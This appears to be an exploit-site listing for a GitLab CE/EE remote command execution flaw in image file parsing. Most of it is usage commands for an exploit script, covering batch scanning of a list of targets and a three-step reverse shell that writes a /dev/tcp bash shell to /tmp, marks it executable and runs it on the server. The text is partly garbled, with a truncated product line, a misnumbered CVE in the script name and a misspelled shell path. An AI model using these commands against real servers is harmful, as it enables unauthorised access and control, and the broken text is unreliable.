Share
## https://sploitus.com/exploit?id=79BE3A4D-54BC-59B4-946F-129A29AFF064
### Vuln Impact
An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
### Vuln Product
- Gitlab CE/EE /tmp/1.txt"
```


##### batch scan
```
python3 CVE-2021-2205.py -s true -f target.txt
```

##### Reserve Shell
```
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'bash -i >& /dev/tcp/ip/port 0>&1' > /tmp/1.sh"
```


```
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "chmod +x /tmp/1.sh"
```


```
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "/bin/bahs /tmp/1.sh"
```

### Reference
https://github.com/mr-r3bot/Gitlab-CVE-2021-22205
https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html